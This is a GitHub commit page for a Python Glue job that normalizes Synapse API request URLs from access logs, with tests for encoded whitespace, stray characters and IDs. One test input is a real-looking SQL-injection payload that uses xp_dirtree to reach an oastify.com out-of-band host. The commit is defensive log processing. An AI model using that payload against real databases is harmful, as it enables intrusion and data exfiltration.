Skip to content

Commit

Permalink
Merge pull request #42 from SandhraSokhal/PLFM-7965
Browse files Browse the repository at this point in the history
PLFM-7965
  • Loading branch information
john-hill authored Oct 6, 2023
2 parents 7bef7ec + 9c40d5e commit f6e8752
Show file tree
Hide file tree
Showing 3 changed files with 214 additions and 4 deletions.
28 changes: 26 additions & 2 deletions src/scripts/glue_jobs/process_access_record.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,8 @@

import sys
import re
import urllib.parse

from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
Expand Down Expand Up @@ -96,7 +98,7 @@ def transform(dynamic_record):


def get_normalized_method_signature(requesturl):
url = requesturl.lower()
url = decode_url(requesturl.lower())
prefix_index = url.find('/v1/')
if prefix_index == -1:
return "INVALID URL"
Expand All @@ -109,10 +111,32 @@ def get_normalized_method_signature(requesturl):
result = "/evaluation/name/#"
elif requesturl.startswith("/entity/alias"):
result = "/entity/alias/#"
elif requesturl.startswith("/2fa"):
result = requesturl
elif requesturl.startswith("/user/bundle"):
result = "/user/bundle"
elif "/access/" in requesturl:
result = "/objects/#/access/#"
elif "/schema/type/" in requesturl:
result = "/schema/type/#"
else:
result = re.sub("/(syn\\d+|\\d+)", "/#", requesturl)
# find and remove substring in url starting from ';' until '/' if present.
result = re.sub(r';[^/]+', '', requesturl)
# find and remove special characters in url
result = re.sub(r'[\'!@$%^&*()_+{}\[\]:;<>,.?~\\|=]+', '', result)
# find and replace substrings with length >=2 in url containing ids with '#'. ID can start with 'syn',
# 'fh' or digits.
result = re.sub(r'\b(syn|fh)\d+(\.\d+)?\b|\b\d+(\w+)?[^/]\b', '#', result)
# The regex provided above doesn't account for substrings with a length of 1.
# Find and replace substring in url containing only digits.
result = re.sub(r'/\d+', '/#', result)
return result

def decode_url(encoded_url):
    """Percent-decode a URL and remove every whitespace character from it.

    Args:
        encoded_url: The URL string, possibly containing percent-escapes
            such as ``%20`` or ``%0A``, or ``None``.

    Returns:
        The decoded URL with all whitespace (spaces, tabs, newlines,
        carriage returns, ...) removed, or ``None`` when the input is
        ``None``.
    """
    if encoded_url is None:
        return None
    decoded_url = urllib.parse.unquote(encoded_url)
    # str.split() without arguments splits on any run of whitespace, so
    # re-joining the pieces drops whitespace wherever it occurs in the URL,
    # not only at the ends.
    return "".join(decoded_url.split())

def get_client(user_agent):
if user_agent is None:
Expand Down
3 changes: 1 addition & 2 deletions src/scripts/glue_jobs/utils.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,8 +17,7 @@ def syn_id_string_to_int(input_string):
def ms_to_partition_date(timestamp_ms):
    """Convert an epoch timestamp in milliseconds to a UTC date string.

    Args:
        timestamp_ms: Milliseconds since the Unix epoch (int or float).

    Returns:
        The UTC calendar date of the timestamp formatted as ``YYYY-MM-DD``.
    """
    # Imported locally so the block does not depend on how the module
    # imports ``datetime`` at file level.
    from datetime import timezone

    # datetime.utcfromtimestamp() is deprecated since Python 3.12; the
    # timezone-aware call yields the same UTC calendar date.
    utc_moment = datetime.fromtimestamp(timestamp_ms / 1000.0, tz=timezone.utc)
    return utc_moment.strftime("%Y-%m-%d")


def remove_padded_leading_zeros(input_string):
    """Strip zero-padding from the left of a string.

    Args:
        input_string: The string to strip, or ``None``.

    Returns:
        ``input_string`` without its leading ``"0"`` characters, or ``None``
        when the input is ``None``. A string made only of zeros becomes the
        empty string.
    """
    if input_string is None:
        return input_string
    return input_string.lstrip("0")
187 changes: 187 additions & 0 deletions tests/test_process_access_record.py
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,193 @@ def test_normalized_signature_for_random_valid_url(self):
real_output = process_access_record.get_normalized_method_signature("repo/v1/admin/locks")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_space_at_end(self):
    # A trailing "%20" (URL-encoded space) after the id must not show up in the signature.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn35487770%20")
    self.assertEqual("/entity/#", actual)

def test_normalized_signature_with_space_before_synId(self):
    # "%20" (URL-encoded space) placed in front of the id.
    request_url = "/repo/v1/entity/%20syn24829449/annotations2"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/annotations2", actual)

def test_normalized_signature_with_space_in_middle(self):
    # Two URL-encoded spaces between the id and the next path segment.
    request_url = "/file/v1/entity/syn52201498%20%20/uploadDestination"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/uploaddestination", actual)

def test_normalized_signature_with_squareBracket(self):
    # "%5B" / "%5D" are the URL-encoded "[" and "]" wrapped around the id.
    request_url = "/repo/v1/accessRequirement/%5B9605670%5D/submissions"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/accessrequirement/#/submissions", actual)

def test_normalized_signature_for_synId_with_version(self):
    # The id carries a ".1" version suffix and the path ends in a numeric id.
    request_url = "/repo/v1/entity/syn51718024.1/table/transaction/async/get/28738082"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/table/transaction/async/get/#", actual)

def test_normalized_signature_with_special_char_at_end(self):
    # A stray "@" directly after the trailing numeric id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn6131484/wiki/402033@")
    self.assertEqual("/entity/#/wiki/#", actual)

def test_normalized_signature_with_semicolon_with_url(self):
    # Everything from the ";" onwards is free text appended to the wiki id.
    request_url = "/repo/v1/entity/syn4939906/wiki/235909;%20Combination%20Index%20Validation%20Studies%20(2%20drug%20combinations)%20-%20syn4939876%20-%20Wiki%20(Synapse | Sage Bionetworks "
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/wiki/#", actual)

def test_normalized_signature_with_semicolon_with_text(self):
    # The last path segment consists only of ";" followed by text.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn3193805/wiki/;D12")
    self.assertEqual("/entity/#/wiki/", actual)

def test_normalized_signature_with_semicolon_in_middle(self):
    # A bare ";" directly after an id in the middle of the path.
    request_url = "/repo/v1/entity/syn2811262/wiki2/78388;/wikihistory"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/wiki2/#/wikihistory", actual)

def test_normalized_signature_with_semicolon_in_middle_with_text(self):
    # ";" followed by text after an id in the middle of the path.
    request_url = "/repo/v1/entity/syn2811262/wiki2/78388;DA12/wikihistory"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/wiki2/#/wikihistory", actual)

def test_normalized_signature_with_new_line(self):
    # "%0A" is a URL-encoded line feed following the id.
    request_url = "/file/v1/entity/syn51320810%0A/uploadDestination"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/uploaddestination", actual)

def test_normalized_signature_with_multiple_new_line(self):
    # Two consecutive URL-encoded line feeds ("%0A%0A") following the id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn26592177%0A%0A/bundle2")
    self.assertEqual("/entity/#/bundle2", actual)

def test_normalized_signature_with_carriageReturn(self):
    # A single URL-encoded carriage return ("%0D") following the id. The
    # doubled "%0D%0D" form is covered by the multiple-carriage-return test,
    # so this case uses exactly one to exercise a distinct input.
    expected_output = "/entity/#/annotations2"
    real_output = process_access_record.get_normalized_method_signature(
        "/repo/v1/entity/syn50920803%0D/annotations2")
    self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_multiple_carriageReturn(self):
    # Two consecutive URL-encoded carriage returns ("%0D%0D") following the id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn50920803%0D%0D/bundle2")
    self.assertEqual("/entity/#/bundle2", actual)

def test_normalized_signature_with_carriageReturn_before_synId(self):
    # The id is preceded by "%09%0A", i.e. a URL-encoded tab followed by a
    # line feed. The leftover debug print was removed so the test run stays
    # quiet.
    expected_output = "/entity/#/uploaddestination"
    real_output = process_access_record.get_normalized_method_signature(
        "/file/v1/entity/%09%0Asyn51770520/uploadDestination")
    self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_drs_access_url_with_synId(self):
    # A URL containing "/access/" whose object id is a versioned syn id.
    request_url = "/ga4gh/drs/v1/objects/syn27076339.1/access/FileEntity_syn27076339.1_88312772"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/objects/#/access/#", actual)

def test_normalized_signature_for_drs_access_url_with_filehandleId(self):
    # A URL containing "/access/" whose object id uses the "fh" prefix.
    request_url = "/ga4gh/drs/v1/objects/fh127243131/access/127243131"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/objects/#/access/#", actual)

def test_normalized_signature_for_drs_object(self):
    # An objects URL ending in a versioned syn id.
    actual = process_access_record.get_normalized_method_signature("/ga4gh/drs/v1/objects/syn35423183.1")
    self.assertEqual("/objects/#", actual)

def test_normalized_signature_for_drs_object_for_fileHandleId(self):
    # An objects URL ending in an "fh"-prefixed id.
    actual = process_access_record.get_normalized_method_signature("/ga4gh/drs/v1/objects/fh123")
    self.assertEqual("/objects/#", actual)

def test_normalized_signature_for_schema_type(self):
    # Any URL containing "/schema/type/" is expected to collapse to one fixed signature.
    request_url = "/repo/v1/schema/type/registered/a245ac37480fc40739836ce61801d19f1-my.schema-0.36652.1"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/schema/type/#", actual)

def test_normalized_signature_for_evaluation_submission_with_string_id(self):
    # The submission id mixes digits, underscores and letters.
    request_url = "/repo/v1/evaluation/submission/9720221_curl_168/status"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/evaluation/submission/#/status", actual)

def test_normalized_signature_for_evaluation_submission_with_file_handle_id(self):
    # A mixed submission id followed by a purely numeric id after "/file/".
    request_url = "/repo/v1/evaluation/submission/9720221_curl_168/file/123"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/evaluation/submission/#/file/#", actual)

def test_normalized_signature_for_data_access_submission_id_with_vr(self):
    # The id is numeric with a trailing "vr" suffix.
    request_url = "/repo/v1/dataAccessSubmission/7416vr"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/dataaccesssubmission/#", actual)

def test_normalized_signature_for_entity_with_version_in_end(self):
    # The path ends with a numeric version number.
    request_url = "/repo/v1/entity/syn9692796/version/98"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/version/#", actual)

def test_normalized_signature_for_entity_with_vesion_in_middle(self):
    # A single-digit version number sits between two literal path segments.
    request_url = "/repo/v1/entity/syn25830585/version/1/json"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/entity/#/version/#/json", actual)


def test_normalized_signature_for_team_member_with_query_parameters(self):
    # Query-style parameters are glued to the id with "&" instead of "?".
    request_url = "/repo/v1/teamMembers/3431460&limit=50&offset=0"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/teammembers/#", actual)

def test_normalized_signature_for_team_with_singleQuotes(self):
    # A stray single quote directly after the team id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011'")
    self.assertEqual("/team/#", actual)

def test_normalized_signature_for_team_with_bracket(self):
    # A stray ")" directly after the team id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011)")
    self.assertEqual("/team/#", actual)

def test_normalized_signature_for_team_with_comma(self):
    # A stray "," directly after the team id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011,")
    self.assertEqual("/team/#", actual)

def test_normalized_signature_for_team_with_dot(self):
    # A stray "." directly after the team id.
    actual = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011.")
    self.assertEqual("/team/#", actual)

def test_normalized_signature_for_bundle(self):
    # A "/user/bundle" URL with an SQL-injection style payload appended after ";".
    request_url = "/repo/v1/user/bundle;declare%20@q%20varchar(99);set%20@q='%5C%5Cb2eg7v959m35phq0mzthfsysajgf491a0yroff72xqm.oasti'+'fy.com%5Cfmt';%20exec%20master.dbo.xp_dirtree%20@q;--%20"
    actual = process_access_record.get_normalized_method_signature(request_url)
    self.assertEqual("/user/bundle", actual)

def test_normalized_signature_for_twoFA(self):
    # A "/2fa" path contains a digit but is expected to come back unchanged.
    actual = process_access_record.get_normalized_method_signature("/auth/v1/2fa/enroll")
    self.assertEqual("/2fa/enroll", actual)

def test_normalized_signature_for_twoFA_mixed_case(self):
    # This method was an exact copy of test_normalized_signature_for_twoFA;
    # a second definition under the same name replaces the first in the
    # class body, so only one of them ever ran. It now has its own name and
    # feeds a mixed-case URL, which is lower-cased before matching and
    # should therefore produce the same signature.
    expected_output = "/2fa/enroll"
    real_output = process_access_record.get_normalized_method_signature("/auth/v1/2FA/Enroll")
    self.assertEqual(expected_output, real_output)

def test_get_client_for_web(self):
expected_output = "WEB"
real_output = process_access_record.get_client("Synapse-Web-Client/435.0")
Expand Down

0 comments on commit f6e8752

Please sign in to comment.